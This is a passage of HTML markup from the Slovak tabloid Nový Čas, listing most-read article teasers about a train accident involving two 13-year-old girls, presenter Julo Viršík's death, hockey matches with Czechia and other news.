                title="Prehovorila svedkyňa tragédie, pri ktorej vlak zrazil Lauru († 13 ) a Lindu (13): Srdcervúca rozlúčka mamy jedného z dievčat"
                data-event="hp|najcitanejsie|clanok-5">
                
            <img class="lazy_load"
                src="https://img.cas.sk/cas//320px-c1/3328703.jpg/bratislava-vlak-zrazka-nestastie-kamaratky-devinska.jpg"
                title="Prehovorila svedkyňa tragédie, pri ktorej vlak zrazil Lauru († 13 ) a Lindu (13): Srdcervúca rozlúčka mamy jedného z dievčat | Nový Čas" alt="Prehovorila svedkyňa"
                data-src="https://img.cas.sk/cas//320px-c1/3328703.jpg/bratislava-vlak-zrazka-nestastie-kamaratky-devinska.jpg"
                data-1024="https://img.cas.sk/cas//320px-c1/3328703.jpg/bratislava-vlak-zrazka-nestastie-kamaratky-devinska.jpg"
                data-1024x2="https://img.cas.sk/cas//640px-c1/3328703.jpg/bratislava-vlak-zrazka-nestastie-kamaratky-devinska.jpg"
                style="display: none;">

                <noscript><img src="https://img.cas.sk/cas//320px-c1/3328703.jpg/bratislava-vlak-zrazka-nestastie-kamaratky-devinska.jpg"></noscript>
            </a>
            <a data-event="hp|najcitanejsie|clanok-5"
            href="/clanok/2537109/prehovorila-svedkyna-tragedie-pri-ktorej-vlak-zrazil-lauru-13-a-lindu-13-srdcervuca-rozlucka-mamy-jedneho-z-dievcat/"
            title="Prehovorila svedkyňa tragédie, pri ktorej vlak zrazil Lauru († 13 ) a Lindu (13): Srdcervúca rozlúčka mamy jedného z dievčat"
            data-event="hp|najcitanejsie|clanok-5">
                <span class="hidden lg-visible md-visible sm-visible ">Prehovorila svedkyňa tragédie, pri ktorej vlak zrazil Lauru († 13 ) a Lindu (13): Srdcervúca rozlúčka mamy jedného z dievčat</span>
        
                <span class="hidden xs-visible">Prehovorila svedkyňa tragédie, pri ktorej vlak zrazil Lauru († 13 ) a Lindu (13): Neubránite sa slzám!</span>
        
            </a>
            <div class="tiny-clear"></div>
        </div>
        <div class="article-item  with-image">
            <div class="article-item-number  xs-hidden">6.</div>
            <a class="article-image hidden"
                href="/clanok/2537439/bezpecnostny-analytik-o-zadrzani-sefa-uradu-inspekcnej-sluzby-szaboa-je-to-katastrofa-sme-na-smiech/"
                title="Bezpečnostný analytik o zadržaní šéfa Úradu inšpekčnej služby Szabóa: Je to katastrofa, sme na smiech!"
                data-event="hp|najcitanejsie|clanok-6">
                
            <img class="lazy_load"
                src="https://img.cas.sk/cas//320px-c1/3329131.png/sis-adrian-szabo.png"
                title="Bezpečnostný analytik o zadržaní šéfa Úradu inšpekčnej služby Szabóa: Je to katastrofa, sme na smiech! | Nový Čas" alt="Bezpečnostný analytik"
                data-src="https://img.cas.sk/cas//320px-c1/3329131.png/sis-adrian-szabo.png"
                data-1024="https://img.cas.sk/cas//320px-c1/3329131.png/sis-adrian-szabo.png"
                data-1024x2="https://img.cas.sk/cas//640px-c1/3329131.png/sis-adrian-szabo.png"
                style="display: none;">

                <noscript><img src="https://img.cas.sk/cas//320px-c1/3329131.png/sis-adrian-szabo.png"></noscript>
            </a>
            <a data-event="hp|najcitanejsie|clanok-6"
            href="/clanok/2537439/bezpecnostny-analytik-o-zadrzani-sefa-uradu-inspekcnej-sluzby-szaboa-je-to-katastrofa-sme-na-smiech/"
            title="Bezpečnostný analytik o zadržaní šéfa Úradu inšpekčnej služby Szabóa: Je to katastrofa, sme na smiech!"
            data-event="hp|najcitanejsie|clanok-6">
                <span class="hidden lg-visible md-visible sm-visible ">Bezpečnostný analytik o zadržaní šéfa Úradu inšpekčnej služby Szabóa: Je to katastrofa, sme na smiech!</span>
        
                <span class="hidden xs-visible">Analytik o zadržaní Szabóa: Je to katastrofa, sme na smiech!</span>
        
            </a>
            <div class="tiny-clear"></div>
        </div>
        <div class="article-item  with-image">
            <div class="article-item-number  xs-hidden">7.</div>
            <a class="article-image hidden"
                href="/clanok/2537083/linda-26-zomrela-po-porode-v-piestanoch-vdovec-musel-zostat-na-materskej-rodina-rozbehla-zbierku/"
                title="Linda († 26) zomrela po pôrode v Piešťanoch, vdovec musel zostať na materskej: Rodina rozbehla zbierku"
                data-event="hp|najcitanejsie|clanok-7">
                
            <img class="lazy_load"
                src="https://img.cas.sk/cas//320px-c1/3328419.png/smrt-dcerka-vyjadrenie-piestany-porod-manzelka-materska-linda-sergej.png"
                title="Linda († 26) zomrela po pôrode v Piešťanoch, vdovec musel zostať na materskej: Rodina rozbehla zbierku | Nový Čas" alt="Linda (†"
                data-src="https://img.cas.sk/cas//320px-c1/3328419.png/smrt-dcerka-vyjadrenie-piestany-porod-manzelka-materska-linda-sergej.png"
                data-1024="https://img.cas.sk/cas//320px-c1/3328419.png/smrt-dcerka-vyjadrenie-piestany-porod-manzelka-materska-linda-sergej.png"
                data-1024x2="https://img.cas.sk/cas//640px-c1/3328419.png/smrt-dcerka-vyjadrenie-piestany-porod-manzelka-materska-linda-sergej.png"
                style="display: none;">

                <noscript><img src="https://img.cas.sk/cas//320px-c1/3328419.png/smrt-dcerka-vyjadrenie-piestany-porod-manzelka-materska-linda-sergej.png"></noscript>
            </a>
            <a data-event="hp|najcitanejsie|clanok-7"
            href="/clanok/2537083/linda-26-zomrela-po-porode-v-piestanoch-vdovec-musel-zostat-na-materskej-rodina-rozbehla-zbierku/"
            title="Linda († 26) zomrela po pôrode v Piešťanoch, vdovec musel zostať na materskej: Rodina rozbehla zbierku"
            data-event="hp|najcitanejsie|clanok-7">
                <span class="hidden lg-visible md-visible sm-visible ">Linda († 26) zomrela po pôrode v Piešťanoch, vdovec musel zostať na materskej: Rodina rozbehla zbierku</span>
        
                <span class="hidden xs-visible">Slovák Sergej prišiel o životnú lásku († 26), musel zostať na materskej</span>
        
            </a>
            <div class="tiny-clear"></div>
        </div>
        <div class="article-item  with-image">
            <div class="article-item-number  xs-hidden">8.</div>
            <a class="article-image hidden"
                href="/clanok/2536561/co-to-na-nas-hraju-forgac-sokoval-najnovsimi-vyjadreniami-pravda-o-rozchode-s-manzelkou/"
                title="Čo to na nás hrajú?! Forgáč šokoval najnovšími vyjadreniami: Pravda o rozchode s manželkou!"
                data-event="hp|najcitanejsie|clanok-8">
                
            <img class="lazy_load"
                src="https://img.cas.sk/cas//320px-c1/3327383.jpg/marcel-forgac-adriana-manzelka.jpg"
                title="Čo to na nás hrajú?! Forgáč šokoval najnovšími vyjadreniami: Pravda o rozchode s manželkou! | Nový Čas" alt="Čo to"
                data-src="https://img.cas.sk/cas//320px-c1/3327383.jpg/marcel-forgac-adriana-manzelka.jpg"
                data-1024="https://img.cas.sk/cas//320px-c1/3327383.jpg/marcel-forgac-adriana-manzelka.jpg"
                data-1024x2="https://img.cas.sk/cas//640px-c1/3327383.jpg/marcel-forgac-adriana-manzelka.jpg"
                style="display: none;">

                <noscript><img src="https://img.cas.sk/cas//320px-c1/3327383.jpg/marcel-forgac-adriana-manzelka.jpg"></noscript>
            </a>
            <a data-event="hp|najcitanejsie|clanok-8"
            href="/clanok/2536561/co-to-na-nas-hraju-forgac-sokoval-najnovsimi-vyjadreniami-pravda-o-rozchode-s-manzelkou/"
            title="Čo to na nás hrajú?! Forgáč šokoval najnovšími vyjadreniami: Pravda o rozchode s manželkou!"
            data-event="hp|najcitanejsie|clanok-8">
                <span class="hidden lg-visible md-visible sm-visible ">Čo to na nás hrajú?! Forgáč šokoval najnovšími vyjadreniami: Pravda o rozchode s manželkou!</span>
        
                <span class="hidden xs-visible">Forgáč šokoval najnovšími vyjadreniami o rozchode s manželkou</span>
        
            </a>
            <div class="tiny-clear"></div>
        </div>
			</div>			<div class="switch-content 3d hidden">        <div class="article-item article-item-first with-image">
            <div class="article-item-number  xs-hidden">1.</div>
            <a class="article-image hidden"
                href="/clanok/2536261/sokujuce-odhalenie-slovenska-posta-riesi-cudne-praktiky-zamestnankyne-ludia-hromzia/"
                title="Šokujúce odhalenie! Slovenská pošta rieši čudné praktiky zamestnankyne, ľudia hromžia"
                data-event="hp|najcitanejsie|clanok-1">
                
            <img class="lazy_load"
                src="https://img.cas.sk/cas//320px-c1/3326723.png/problemy-zadrzanie-posta-postarka-prijem-zasielky-potvorice-roznasanie-odosielanie.png"
                title="Šokujúce odhalenie! Slovenská pošta rieši čudné praktiky zamestnankyne, ľudia hromžia | Nový Čas" alt="Šokujúce odhalenie!"
                data-src="https://img.cas.sk/cas//320px-c1/3326723.png/problemy-zadrzanie-posta-postarka-prijem-zasielky-potvorice-roznasanie-odosielanie.png"
                data-1024="https://img.cas.sk/cas//320px-c1/3326723.png/problemy-zadrzanie-posta-postarka-prijem-zasielky-potvorice-roznasanie-odosielanie.png"
                data-1024x2="https://img.cas.sk/cas//640px-c1/3326723.png/problemy-zadrzanie-posta-postarka-prijem-zasielky-potvorice-roznasanie-odosielanie.png"
                style="display: none;">

                <noscript><img src="https://img.cas.sk/cas//320px-c1/3326723.png/problemy-zadrzanie-posta-postarka-prijem-zasielky-potvorice-roznasanie-odosielanie.png"></noscript>
            </a>
            <a data-event="hp|najcitanejsie|clanok-1"
            href="/clanok/2536261/sokujuce-odhalenie-slovenska-posta-riesi-cudne-praktiky-zamestnankyne-ludia-hromzia/"
            title="Šokujúce odhalenie! Slovenská pošta rieši čudné praktiky zamestnankyne, ľudia hromžia"
            data-event="hp|najcitanejsie|clanok-1">
                <span class="hidden lg-visible md-visible sm-visible ">Šokujúce odhalenie! Slovenská pošta rieši čudné praktiky zamestnankyne, ľudia hromžia</span>
        
                <span class="hidden xs-visible">Šokujúce odhalenie! Slovenská pošta rieši čudné praktiky zamestnankyne</span>
        
            </a>
            <div class="tiny-clear"></div>
        </div>
        <div class="article-item  with-image">
            <div class="article-item-number  xs-hidden">2.</div>
            <a class="article-image hidden"
                href="/clanok/2537109/prehovorila-svedkyna-tragedie-pri-ktorej-vlak-zrazil-lauru-13-a-lindu-13-srdcervuca-rozlucka-mamy-jedneho-z-dievcat/"
                title="Prehovorila svedkyňa tragédie, pri ktorej vlak zrazil Lauru († 13 ) a Lindu (13): Srdcervúca rozlúčka mamy jedného z dievčat"
                data-event="hp|najcitanejsie|clanok-2">
                
            <img class="lazy_load"
                src="https://img.cas.sk/cas//320px-c1/3328703.jpg/bratislava-vlak-zrazka-nestastie-kamaratky-devinska.jpg"
                title="Prehovorila svedkyňa tragédie, pri ktorej vlak zrazil Lauru († 13 ) a Lindu (13): Srdcervúca rozlúčka mamy jedného z dievčat | Nový Čas" alt="Prehovorila svedkyňa"
                data-src="https://img.cas.sk/cas//320px-c1/3328703.jpg/bratislava-vlak-zrazka-nestastie-kamaratky-devinska.jpg"
                data-1024="https://img.cas.sk/cas//320px-c1/3328703.jpg/bratislava-vlak-zrazka-nestastie-kamaratky-devinska.jpg"
                data-1024x2="https://img.cas.sk/cas//640px-c1/3328703.jpg/bratislava-vlak-zrazka-nestastie-kamaratky-devinska.jpg"
                style="display: none;">

                <noscript><img src="https://img.cas.sk/cas//320px-c1/3328703.jpg/bratislava-vlak-zrazka-nestastie-kamaratky-devinska.jpg"></noscript>
            </a>
            <a data-event="hp|najcitanejsie|clanok-2"
            href="/clanok/2537109/prehovorila-svedkyna-tragedie-pri-ktorej-vlak-zrazil-lauru-13-a-lindu-13-srdcervuca-rozlucka-mamy-jedneho-z-dievcat/"
            title="Prehovorila svedkyňa tragédie, pri ktorej vlak zrazil Lauru († 13 ) a Lindu (13): Srdcervúca rozlúčka mamy jedného z dievčat"
            data-event="hp|najcitanejsie|clanok-2">
                <span class="hidden lg-visible md-visible sm-visible ">Prehovorila svedkyňa tragédie, pri ktorej vlak zrazil Lauru († 13 ) a Lindu (13): Srdcervúca rozlúčka mamy jedného z dievčat</span>
        
                <span class="hidden xs-visible">Prehovorila svedkyňa tragédie, pri ktorej vlak zrazil Lauru († 13 ) a Lindu (13): Neubránite sa slzám!</span>
        
            </a>
            <div class="tiny-clear"></div>
        </div>
        <div class="article-item  with-image">
            <div class="article-item-number  xs-hidden">3.</div>
            <a class="article-image hidden"
                href="/clanok/2536555/po-nahlej-smrti-jula-virsika-56-prisla-dalsia-rana-rozhodnutie-ktore-budu-mnohi-niest-len-tazko/"
                title="Po náhlej smrti Jula Viršíka († 56) prišla ďalšia rana: Rozhodnutie, ktoré budú mnohí niesť len ťažko"
                data-event="hp|najcitanejsie|clanok-3">
                
            <img class="lazy_load"
                src="https://img.cas.sk/cas//320px-c1/3327335.jpg/julo-virsik.jpg"
                title="Po náhlej smrti Jula Viršíka († 56) prišla ďalšia rana: Rozhodnutie, ktoré budú mnohí niesť len ťažko | Nový Čas" alt="Po náhlej"
                data-src="https://img.cas.sk/cas//320px-c1/3327335.jpg/julo-virsik.jpg"
                data-1024="https://img.cas.sk/cas//320px-c1/3327335.jpg/julo-virsik.jpg"
                data-1024x2="https://img.cas.sk/cas//640px-c1/3327335.jpg/julo-virsik.jpg"
                style="display: none;">

                <noscript><img src="https://img.cas.sk/cas//320px-c1/3327335.jpg/julo-virsik.jpg"></noscript>
            </a>
            <a data-event="hp|najcitanejsie|clanok-3"
            href="/clanok/2536555/po-nahlej-smrti-jula-virsika-56-prisla-dalsia-rana-rozhodnutie-ktore-budu-mnohi-niest-len-tazko/"
            title="Po náhlej smrti Jula Viršíka († 56) prišla ďalšia rana: Rozhodnutie, ktoré budú mnohí niesť len ťažko"
            data-event="hp|najcitanejsie|clanok-3">
                <span class="hidden lg-visible md-visible sm-visible ">Po náhlej smrti Jula Viršíka († 56) prišla ďalšia rana: Rozhodnutie, ktoré budú mnohí niesť len ťažko</span>
        
                <span class="hidden xs-visible">Po náhlej smrti Jula Viršíka († 56) prišla ďalšia rana</span>
        
            </a>
            <div class="tiny-clear"></div>
        </div>
        <div class="article-item  with-image">
            <div class="article-item-number  xs-hidden">4.</div>
            <a class="article-image hidden"
                href="/clanok/2536545/po-nevydarenom-zapase-s-ceskom-sa-vynaraju-pochybnosti-je-toto-pravy-dovod-prehry-slovenska/"
                title="Po nevydarenom zápase s Českom sa vynárajú pochybnosti: Je toto pravý dôvod prehry Slovenska?"
                data-event="hp|najcitanejsie|clanok-4">
                
            <img class="lazy_load"
                src="https://img.cas.sk/cas//320px-c1/3327339.jpg/hokej.jpg"
                title="Po nevydarenom zápase s Českom sa vynárajú pochybnosti: Je toto pravý dôvod prehry Slovenska? | Nový Čas" alt="Po nevydarenom"
                data-src="https://img.cas.sk/cas//320px-c1/3327339.jpg/hokej.jpg"
                data-1024="https://img.cas.sk/cas//320px-c1/3327339.jpg/hokej.jpg"
                data-1024x2="https://img.cas.sk/cas//640px-c1/3327339.jpg/hokej.jpg"
                style="display: none;">

                <noscript><img src="https://img.cas.sk/cas//320px-c1/3327339.jpg/hokej.jpg"></noscript>
            </a>
            <a data-event="hp|najcitanejsie|clanok-4"
            href="/clanok/2536545/po-nevydarenom-zapase-s-ceskom-sa-vynaraju-pochybnosti-je-toto-pravy-dovod-prehry-slovenska/"
            title="Po nevydarenom zápase s Českom sa vynárajú pochybnosti: Je toto pravý dôvod prehry Slovenska?"
            data-event="hp|najcitanejsie|clanok-4">
                <span class="hidden lg-visible md-visible sm-visible ">Po nevydarenom zápase s Českom sa vynárajú pochybnosti: Je toto pravý dôvod prehry Slovenska?</span>
        
                <span class="hidden xs-visible">Je toto pravý dôvod prehry s Českom?</span>
        
            </a>
            <div class="tiny-clear"></div>
        </div>
        <div class="article-item  with-image">
            <div class="article-item-number  xs-hidden">5.</div>
            <a class="article-image hidden"
                href="/clanok/2536561/co-to-na-nas-hraju-forgac-sokoval-najnovsimi-vyjadreniami-pravda-o-rozchode-s-manzelkou/"
                title="Čo to na nás hrajú?! Forgáč šokoval najnovšími vyjadreniami: Pravda o rozchode s manželkou!"
                data-event="hp|najcitanejsie|clanok-5">
                
            <img class="lazy_load"
                src="https://img.cas.sk/cas//320px-c1/3327383.jpg/marcel-forgac-adriana-manzelka.jpg"
                title="Čo to na nás hrajú?! Forgáč šokoval najnovšími vyjadreniami: Pravda o rozchode s manželkou! | Nový Čas" alt="Čo to"
                data-src="https://img.cas.sk/cas//320px-c1/3327383.jpg/marcel-forgac-adriana-manzelka.jpg"
                data-1024="https://img.cas.sk/cas//320px-c1/3327383.jpg/marcel-forgac-adriana-manzelka.jpg"
                data-1024x2="https://img.cas.sk/cas//640px-c1/3327383.jpg/marcel-forgac-adriana-manzelka.jpg"
                style="display: none;">

                <noscript><img src="https://img.cas.sk/cas//320px-c1/3327383.jpg/marcel-forgac-adriana-manzelka.jpg"></noscript>
            </a>
            <a data-event="hp|najcitanejsie|clanok-5"
            href="/clanok/2536561/co-to-na-nas-hraju-forgac-sokoval-najnovsimi-vyjadreniami-pravda-o-rozchode-s-manzelkou/"
            title="Čo to na nás hrajú?! Forgáč šokoval najnovšími vyjadreniami: Pravda o rozchode s manželkou!"
            data-event="hp|najcitanejsie|clanok-5">
                <span class="hidden lg-visible md-visible sm-visible ">Čo to na nás hrajú?! Forgáč šokoval najnovšími vyjadreniami: Pravda o rozchode s manželkou!</span>
        
                <span class="hidden xs-visible">Forgáč šokoval najnovšími vyjadreniami o rozchode s manželkou</span>
        
            </a>
            <div class="tiny-clear"></div>
        </div>
        <div class="article-item  with-image">
            <div class="article-item-number  xs-hidden">6.</div>
            <a class="article-image hidden"
                href="/clanok/2536371/v-cesku-to-pred-zapasom-so-slovenskom-vrie-je-to-hnus-neda-sa-na-to-pozerat/"
                title="V Česku to pred zápasom so Slovenskom vrie: Je to hnus, nedá sa na to pozerať!"
                data-event="hp|najcitanejsie|clanok-6">
                
            <img class="lazy_load"
                src="https://img.cas.sk/cas//320px-c1/3326911.jpg/hokej-filip-pesan.jpg"
                title="V Česku to pred zápasom so Slovenskom vrie: Je to hnus, nedá sa na to pozerať! | Nový Čas" alt="V Česku"
                data-src="https://img.cas.sk/cas//320px-c1/3326911.jpg/hokej-filip-pesan.jpg"
                data-1024="https://img.cas.sk/cas//320px-c1/3326911.jpg/hokej-filip-pesan.jpg"
                data-1024x2="https://img.cas.sk/cas//640px-c1/3326911.jpg/hokej-filip-pesan.jpg"
                style="display: none;">

                <noscript><img src="https://img.cas.sk/cas//320px-c1/3326911.jpg/hokej-filip-pesan.jpg"></noscript>
            </a>
            <a data-event="hp|najcitanejsie|clanok-6"
            href="/clanok/2536371/v-cesku-to-pred-zapasom-so-slovenskom-vrie-je-to-hnus-neda-sa-na-to-pozerat/"
            title="V Česku to pred zápasom so Slovenskom vrie: Je to hnus, nedá sa na to pozerať!"
            data-event="hp|najcitanejsie|clanok-6">
                <span class="hidden lg-visible md-visible sm-visible ">V Česku to pred zápasom so Slovenskom vrie: Je to hnus, nedá sa na to pozerať!</span>
        
                <span class="hidden xs-visible">V Česku to pred zápasom so Slovenskom vrie</span>
        
            </a>
            <div class="tiny-clear"></div>
        </div>
        <div class="article-item  with-image">
            <div class="article-item-number  xs-hidden">7.</div>
            <a class="article-image hidden"
                href="/clanok/2536609/musia-sa-mat-na-pozore-vedci-v-britanii-sa-obavaju-najhorsieho-nevyzera-to-dobre/"
                title="Musia sa mať na pozore: Vedci v Británii sa obávajú najhoršieho! Nevyzerá to dobre"
                data-event="hp|najcitanejsie|clanok-7">
                
            <img class="lazy_load"
                src="https://img.cas.sk/cas//320px-c1/3327493.jpg/koronavirus-opatrenia-nakaza-uvolnovanie-sirenie-pandemia-obavy-odbornici.jpg"
                title="Musia sa mať na pozore: Vedci v Británii sa obávajú najhoršieho! Nevyzerá to dobre | Nový Čas" alt="Musia sa"
                data-src="https://img.cas.sk/cas//320px-c1/3327493.jpg/koronavirus-opatrenia-nakaza-uvolnovanie-sirenie-pandemia-obavy-odbornici.jpg"
                data-1024="https://img.cas.sk/cas//320px-c1/3327493.jpg/koronavirus-opatrenia-nakaza-uvolnovanie-sirenie-pandemia-obavy-odbornici.jpg"
                data-1024x2="https://img.cas.sk/cas//640px-c1/3327493.jpg/koronavirus-opatrenia-nakaza-uvolnovanie-sirenie-pandemia-obavy-odbornici.jpg"
                style="display: none;">

                <noscript><img src="https://img.cas.sk/cas//320px-c1/3327493.jpg/koronavirus-opatrenia-nakaza-uvolnovanie-sirenie-pandemia-obavy-odbornici.jpg"></noscript>
            </a>
            <a data-event="hp|najcitanejsie|clanok-7"
            href="/clanok/2536609/musia-sa-mat-na-pozore-vedci-v-britanii-sa-obavaju-najhorsieho-nevyzera-to-dobre/"
            title="Musia sa mať na pozore: Vedci v Británii sa obávajú najhoršieho! Nevyzerá to dobre"
            data-event="hp|najcitanejsie|clanok-7">
                <span class="hidden lg-visible md-visible sm-visible ">Musia sa mať na pozore: Vedci v Británii sa obávajú najhoršieho! Nevyzerá to dobre</span>
        
                <span class="hidden xs-visible">Vedci v Británii sa obávajú najhoršieho</span>
        
            </a>
            <div class="tiny-clear"></div>
        </div>
        <div class="article-item  with-image">
            <div class="article-item-number  xs-hidden">8.</div>
            <a class="article-image hidden"
                href="/clanok/2535837/detaily-pohrebu-jula-virsika-56-v-krematoriu-uzialeny-kamarat-spravil-tazke-rozhodnutie/"
                title="Detaily pohrebu Jula Viršíka († 56) v krematóriu: Užialený kamarát spravil ťažké rozhodnutie"
                data-event="hp|najcitanejsie|clanok-8">
                
            <img class="lazy_load"
                src="https://img.cas.sk/cas//320px-c1/3323779.png/smrt-moderator-zlyhanie-sok-srdce-julius-virsik.png"
                title="Detaily pohrebu Jula Viršíka († 56) v krematóriu: Užialený kamarát spravil ťažké rozhodnutie | Nový Čas" alt="Detaily pohrebu"
                data-src="https://img.cas.sk/cas//320px-c1/3323779.png/smrt-moderator-zlyhanie-sok-srdce-julius-virsik.png"
                data-1024="https://img.cas.sk/cas//320px-c1/3323779.png/smrt-moderator-zlyhanie-sok-srdce-julius-virsik.png"
                data-1024x2="https://img.cas.sk/cas//640px-c1/3323779.png/smrt-moderator-zlyhanie-sok-srdce-julius-virsik.png"
                style="display: none;">

                <noscript><img src="https://img.cas.sk/cas//320px-c1/3323779.png/smrt-moderator-zlyhanie-sok-srdce-julius-virsik.png"></noscript>
            </a>
            <a data-event="hp|najcitanejsie|clanok-8"
            href="/clanok/2535837/detaily-pohrebu-jula-virsika-56-v-krematoriu-uzialeny-kamarat-spravil-tazke-rozhodnutie/"
            title="Detaily pohrebu Jula Viršíka († 56) v krematóriu: Užialený kamarát spravil ťažké rozhodnutie"
            data-event="hp|najcitanejsie|clanok-8">
                <span class="hidden lg-visible md-visible sm-visible ">Detaily pohrebu Jula Viršíka († 56) v krematóriu: Užialený kamarát spravil ťažké rozhodnutie</span>
        
                <span class="hidden xs-visible">Detaily pohrebu Jula Viršíka († 56) v krematóriu</span>
        
            </a>
            <div class="tiny-clear"></div>
        </div>
			</div>			<div class="switch-content 7d hidden">        <div class="article-item article-item-first with-image">
            <div class="article-item-number  xs-hidden">1.</div>
            <a class="article-image hidden"
                href="/clanok/2534931/smrt-jula-virsika-56-na-co-sa-moderator-stazoval-pred-kolapsom-desivy-boj-o-zivot-v-rukach-manzelky/"
                title="Smrť Jula Viršíka († 56): Na čo sa moderátor sťažoval pred kolapsom? Desivý boj o život v rukách manželky!"
                data-event="hp|najcitanejsie|clanok-1">
                
            <img class="lazy_load"
                src="https://img.cas.sk/cas//320px-c1/3323813.jpg/chata-julo-virsik.jpg"
                title="Smrť Jula Viršíka († 56): Na čo sa moderátor sťažoval pred kolapsom? Desivý boj o život v rukách manželky! | Nový Čas" alt="Smrť Jula"
                data-src="https://img.cas.sk/cas//320px-c1/3323813.jpg/chata-julo-virsik.jpg"
                data-1024="https://img.cas.sk/cas//320px-c1/3323813.jpg/chata-julo-virsik.jpg"
                data-1024x2="https://img.cas.sk/cas//640px-c1/3323813.jpg/chata-julo-virsik.jpg"
                style="display: none;">

                <noscript><img src="https://img.cas.sk/cas//320px-c1/3323813.jpg/chata-julo-virsik.jpg"></noscript>
            </a>
            <a data-event="hp|najcitanejsie|clanok-1"
            href="/clanok/2534931/smrt-jula-virsika-56-na-co-sa-moderator-stazoval-pred-kolapsom-desivy-boj-o-zivot-v-rukach-manzelky/"
            title="Smrť Jula Viršíka († 56): Na čo sa moderátor sťažoval pred kolapsom? Desivý boj o život v rukách manželky!"
            data-event="hp|najcitanejsie|clanok-1">
                <span class="hidden lg-visible md-visible sm-visible ">Smrť Jula Viršíka († 56): Na čo sa moderátor sťažoval pred kolapsom? Desivý boj o život v rukách manželky!</span>
        
                <span class="hidden xs-visible">Smrť Jula Viršíka († 56): Desivý boj o život v rukách manželky!</span>
        
            </a>
            <div class="tiny-clear"></div>
        </div>
        <div class="article-item  with-image">
            <div class="article-item-number  xs-hidden">2.</div>
            <a class="article-image hidden"
                href="/clanok/2536261/sokujuce-odhalenie-slovenska-posta-riesi-cudne-praktiky-zamestnankyne-ludia-hromzia/"
                title="Šokujúce odhalenie! Slovenská pošta rieši čudné praktiky zamestnankyne, ľudia hromžia"
                data-event="hp|najcitanejsie|clanok-2">
                
            <img class="lazy_load"
                src="https://img.cas.sk/cas//320px-c1/3326723.png/problemy-zadrzanie-posta-postarka-prijem-zasielky-potvorice-roznasanie-odosielanie.png"
                title="Šokujúce odhalenie! Slovenská pošta rieši čudné praktiky zamestnankyne, ľudia hromžia | Nový Čas" alt="Šokujúce odhalenie!"
                data-src="https://img.cas.sk/cas//320px-c1/3326723.png/problemy-zadrzanie-posta-postarka-prijem-zasielky-potvorice-roznasanie-odosielanie.png"
                data-1024="https://img.cas.sk/cas//320px-c1/3326723.png/problemy-zadrzanie-posta-postarka-prijem-zasielky-potvorice-roznasanie-odosielanie.png"
                data-1024x2="https://img.cas.sk/cas//640px-c1/3326723.png/problemy-zadrzanie-posta-postarka-prijem-zasielky-potvorice-roznasanie-odosielanie.png"
                style="display: none;">

                <noscript><img src="https://img.cas.sk/cas//320px-c1/3326723.png/problemy-zadrzanie-posta-postarka-prijem-zasielky-potvorice-roznasanie-odosielanie.png"></noscript>
            </a>
            <a data-event="hp|najcitanejsie|clanok-2"
            href="/clanok/2536261/sokujuce-odhalenie-slovenska-posta-riesi-cudne-praktiky-zamestnankyne-ludia-hromzia/"
            title="Šokujúce odhalenie! Slovenská pošta rieši čudné praktiky zamestnankyne, ľudia hromžia"
            data-event="hp|najcitanejsie|clanok-2">
                <span class="hidden lg-visible md-visible sm-visible ">Šokujúce odhalenie! Slovenská pošta rieši čudné praktiky zamestnankyne, ľudia hromžia</span>
        
                <span class="hidden xs-visible">Šokujúce odhalenie! Slovenská pošta rieši čudné praktiky zamestnankyne</span>
        
            </a>
            <div class="tiny-clear"></div>
        </div>
        <div class="article-item  with-image">
            <div class="article-item-number  xs-hidden">3.</div>
            <a class="article-image hidden"
                href="/clanok/2537109/prehovorila-svedkyna-tragedie-pri-ktorej-vlak-zrazil-lauru-13-a-lindu-13-srdcervuca-rozlucka-mamy-jedneho-z-dievcat/"
                title="Prehovorila svedkyňa tragédie, pri ktorej vlak zrazil Lauru († 13 ) a Lindu (13): Srdcervúca rozlúčka mamy jedného z dievčat"
                data-event="hp|najcitanejsie|clanok-3">
                
            <img class="lazy_load"
                src="https://img.cas.sk/cas//320px-c1/3328703.jpg/bratislava-vlak-zrazka-nestastie-kamaratky-devinska.jpg"
                title="Prehovorila svedkyňa tragédie, pri ktorej vlak zrazil Lauru († 13 ) a Lindu (13): Srdcervúca rozlúčka mamy jedného z dievčat | Nový Čas" alt="Prehovorila svedkyňa"
                data-src="https://img.cas.sk/cas//320px-c1/3328703.jpg/bratislava-vlak-zrazka-nestastie-kamaratky-devinska.jpg"
                data-1024="https://img.cas.sk/cas//320px-c1/3328703.jpg/bratislava-vlak-zrazka-nestastie-kamaratky-devinska.jpg"
                data-1024x2="https://img.cas.sk/cas//640px-c1/3328703.jpg/bratislava-vlak-zrazka-nestastie-kamaratky-devinska.jpg"
                style="display: none;">

                <noscript><img src="https://img.cas.sk/cas//320px-c1/3328703.jpg/bratislava-vlak-zrazka-nestastie-kamaratky-devinska.jpg"></noscript>
            </a>
            <a data-event="hp|najcitanejsie|clanok-3"
            href="/clanok/2537109/prehovorila-svedkyna-tragedie-pri-ktorej-vlak-zrazil-lauru-13-a-lindu-13-srdcervuca-rozlucka-mamy-jedneho-z-dievcat/"
            title="Prehovorila svedkyňa tragédie, pri ktorej vlak zrazil Lauru († 13 ) a Lindu (13): Srdcervúca rozlúčka mamy jedného z dievčat"
            data-event="hp|najcitanejsie|clanok-3">
                <span class="hidden lg-visible md-visible sm-visible ">Prehovorila svedkyňa tragédie, pri ktorej vlak zrazil Lauru († 13 ) a Lindu (13): Srdcervúca rozlúčka mamy jedného z dievčat</span>
        
                <span class="hidden xs-visible">Prehovorila svedkyňa tragédie, pri ktorej vlak zrazil Lauru († 13 ) a Lindu (13): Neubránite sa slzám!</span>
        
            </a>
            <div class="tiny-clear"></div>
        </div>
        <div class="article-item  with-image">
            <div class="article-item-number  xs-hidden">4.</div>
            <a class="article-image hidden"
                href="/clanok/2536555/po-nahlej-smrti-jula-virsika-56-prisla-dalsia-rana-rozhodnutie-ktore-budu-mnohi-niest-len-tazko/"
                title="Po náhlej smrti Jula Viršíka († 56) prišla ďalšia rana: Rozhodnutie, ktoré budú mnohí niesť len ťažko"
                data-event="hp|najcitanejsie|clanok-4">
                
            <img class="lazy_load"
                src="https://img.cas.sk/cas//320px-c1/3327335.jpg/julo-virsik.jpg"
                title="Po náhlej smrti Jula Viršíka († 56) prišla ďalšia rana: Rozhodnutie, ktoré budú mnohí niesť len ťažko | Nový Čas" alt="Po náhlej"
                data-src="https://img.cas.sk/cas//320px-c1/3327335.jpg/julo-virsik.jpg"
                data-1024="https://img.cas.sk/cas//320px-c1/3327335.jpg/julo-virsik.jpg"
                data-1024x2="https://img.cas.sk/cas//640px-c1/3327335.jpg/julo-virsik.jpg"
                style="display: none;">

